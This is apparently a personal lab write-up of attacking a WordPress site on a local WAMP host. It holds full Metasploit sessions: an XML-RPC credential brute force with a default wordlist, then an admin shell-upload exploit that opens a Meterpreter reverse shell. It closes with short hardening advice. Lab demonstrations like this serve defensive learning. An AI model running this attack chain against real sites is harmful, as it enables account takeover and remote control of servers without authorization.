This is done in my personal lab, I carried this out mainly out of curiosity because i fell in love with wordpress because of the simplicity with which websites can be deployed though to be honestly fair probably because i don’t want to do alot of graphics and CSS not to mention the many free plugins.
This was carried out on a Windows 10 system running WAMP and wordpress though i don’t think it being WAMP or Windows 10 have any bearing on this attack though being Windows 10 or higher patched versions means you might not be able to elevate priviledges with simple commands like getsystem e.t.c
My biggest worry with wordpress has always been it’s lack of a password count and lockout mechanism, this makes it very open to login bruteforce attacks and credential username_password files, so i setout to see what metasploit had with reference to these credential scanners and the list is quite interesting, some examples are below;
Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/admin/http/wp_custom_contact_forms 2014-08-07 normal WordPress custom-contact-forms Plugin SQL Upload auxiliary/admin/http/wp_easycart_privilege_escalation 2015-02-25 normal WordPress WP EasyCart Plugin Privilege Escalation auxiliary/admin/http/wp_wplms_privilege_escalation 2015-02-09 normal WordPress WPLMS Theme Privilege Escalation auxiliary/dos/http/wordpress_long_password_dos 2014-11-20 normal WordPress Long Password DoS auxiliary/dos/http/wordpress_xmlrpc_dos 2014-08-06 normal WordPress XMLRPC DoS auxiliary/gather/wp_all_in_one_migration_export 2015-03-19 normal WordPress All-in-One Migration Export auxiliary/gather/wp_ultimate_csv_importer_user_extract 2015-02-02 normal WordPress Ultimate CSV Importer User Table Extract auxiliary/gather/wp_w3_total_cache_hash_extract normal WordPress W3-Total-Cache Plugin 0.9.2.4 (or before) Username and Hash Extract auxiliary/scanner/http/wordpress_cp_calendar_sqli 2015-03-03 normal WordPress CP Multi-View Calendar Unauthenticated SQL Injection Scanner auxiliary/scanner/http/wordpress_ghost_scanner normal WordPress XMLRPC GHOST Vulnerability Scanner auxiliary/scanner/http/wordpress_login_enum normal WordPress Brute Force and User Enumeration Utility auxiliary/scanner/http/wordpress_multicall_creds normal WordPress XML-RPC system.multicall Credential Collector auxiliary/scanner/http/wordpress_pingback_access normal WordPress Pingback Locator auxiliary/scanner/http/wordpress_scanner normal WordPress Scanner auxiliary/scanner/http/wordpress_xmlrpc_login normal WordPress XML-RPC Username/Password Login Scanner auxiliary/scanner/http/wp_contus_video_gallery_sqli 2015-02-24 normal WordPress Contus Video Gallery Unauthenticated SQL Injection Scanner auxiliary/scanner/http/wp_dukapress_file_read normal WordPress DukaPress Plugin File Read Vulnerability auxiliary/scanner/http/wp_gimedia_library_file_read normal WordPress GI-Media Library Plugin Directory Traversal Vulnerability auxiliary/scanner/http/wp_mobile_pack_info_disclosure normal WordPress Mobile Pack Information Disclosure Vulnerability auxiliary/scanner/http/wp_mobileedition_file_read normal WordPress Mobile Edition File Read Vulnerability auxiliary/scanner/http/wp_nextgen_galley_file_read normal WordPress NextGEN Gallery Directory Read Vulnerability auxiliary/scanner/http/wp_simple_backup_file_read normal WordPress Simple Backup File Read Vulnerability auxiliary/scanner/http/wp_subscribe_comments_file_read normal WordPress Subscribe Comments File Read Vulnerability
— In this example i used; auxiliary/scanner/http/wordpress_xmlrpc_login
msf > use auxiliary/scanner/http/wordpress_xmlrpc_login msf auxiliary(wordpress_xmlrpc_login) > show options Module options (auxiliary/scanner/http/wordpress_xmlrpc_login):
Name Current Setting Required Description ---- --------------- -------- ----------- BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.0.1 yes The target address range or CIDR identifier RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections STOP_ON_SUCCESS true yes Stop guessing when a credential works for a host TARGETURI /wp yes The base path to the wordpress application THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE /usr/share/wordlists/metasploit/http_default_userpass.txt no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts VHOST no HTTP server virtual host
msf auxiliary(wordpress_xmlrpc_login) >
-- Running the xml scanner yielded results (ofcourse i had input the correct username and password in the file but this is a lab ;) ) msf auxiliary(wordpress_xmlrpc_login) > run [*] 192.168.0.1:80 :/wp/xmlrpc.php - Sending Hello... [+] XMLRPC enabled, Hello message received! [*] Starting XML-RPC login sweep... [-] WORDPRESS_XMLRPC - Failed: 'connect:connect' [-] WORDPRESS_XMLRPC - Failed: 'sitecom:sitecom' [-] WORDPRESS_XMLRPC - Failed: 'admin:1234' [-] WORDPRESS_XMLRPC - Failed: 'cisco:cisco' [-] WORDPRESS_XMLRPC - Failed: 'cisco:sanfran' [-] WORDPRESS_XMLRPC - Failed: 'private:private' [-] WORDPRESS_XMLRPC - Failed: 'wampp:xampp' [-] WORDPRESS_XMLRPC - Failed: 'newuser:wampp' [-] WORDPRESS_XMLRPC - Failed: 'xampp-dav-unsecure:ppmax2011 ' [-] WORDPRESS_XMLRPC - Failed: 'admin:turnkey' [-] WORDPRESS_XMLRPC - Failed: 'vagrant:vagrant' [+] WORDPRESS_XMLRPC - Success: 'admin:wp' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(wordpress_xmlrpc_login) >
— With the username and password, i needed to gain access to this system so i used the module below;
exploit/unix/webapp/wp_admin_shell_upload 2015-02-21 excellent WordPress Admin Shell Upload
msf exploit(wp_admin_shell_upload) > show options Module options (exploit/unix/webapp/wp_admin_shell_upload): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD wp yes The WordPress password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.0.1 yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /wp yes The base path to the wordpress application USERNAME admin yes The WordPress username to authenticate with VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 WordPress msf exploit(wp_admin_shell_upload) >
-- I tried a check to see if i could validate before i do anything but that wasn't allowed for this module; msf exploit(wp_admin_shell_upload) > check [*] 192.168.0.1:80 This module does not support check. msf exploit(wp_admin_shell_upload) > msf exploit(wp_admin_shell_upload) > run [*] Started reverse TCP handler on 192.168.0.2:4444 [*] Authenticating with WordPress using admin:wp... [+] Authenticated with WordPress [*] Preparing payload... [*] Uploading payload... [*] Executing the payload at /wp/wp-content/plugins/JhQupUiFGr/EqiugYHZzJ.php... [*] Sending stage (33721 bytes) to 192.168.0.1 [*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.1:55374) at 2016-12-24 18:18:23 +0300 [+] Deleted EqiugYHZzJ.php [+] Deleted JhQupUiFGr.php meterpreter > shell Process 8780 created. Channel 0 created. Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\wamp64\www\wp\wp-content\plugins\JhQupUiFGr>
— Trying to move futher resulted in another error though this demonstration is to show how easy it is to move from a wordpress page that doesn’t have login timeouts to getting shell access;
-- Below is the error i got for example, though in different scenarios all was fine i probably suspect it has to do with Windows 10 security but i didn't dig into this alot more. C:\wamp64\www\wp\wp-content\plugins\JhQupUiFGr>cd c:\ Terminate channel 0? [y/N] y [-] Error running command shell: Rex::TimeoutError Operation timed out. meterpreter >
- Introduce CAPTCHAs in your wordpress site
- Implement two factor authentication
- Implement login count plugins
The above makes password guessing and bruteforcing difficult especially by bots and automated tools, there are other ways of gaining access for example the bugs in older versions of wordpress, old versions of templates you use, old versions of plugins you have active and these must be kept current because each latest release has a fix for something you might not be aware of.
Newer versions might also have some vulnerabilities but it is safe to say they are known by a very few and are usually patched the moment plugin/template or the wordpress team knows about them.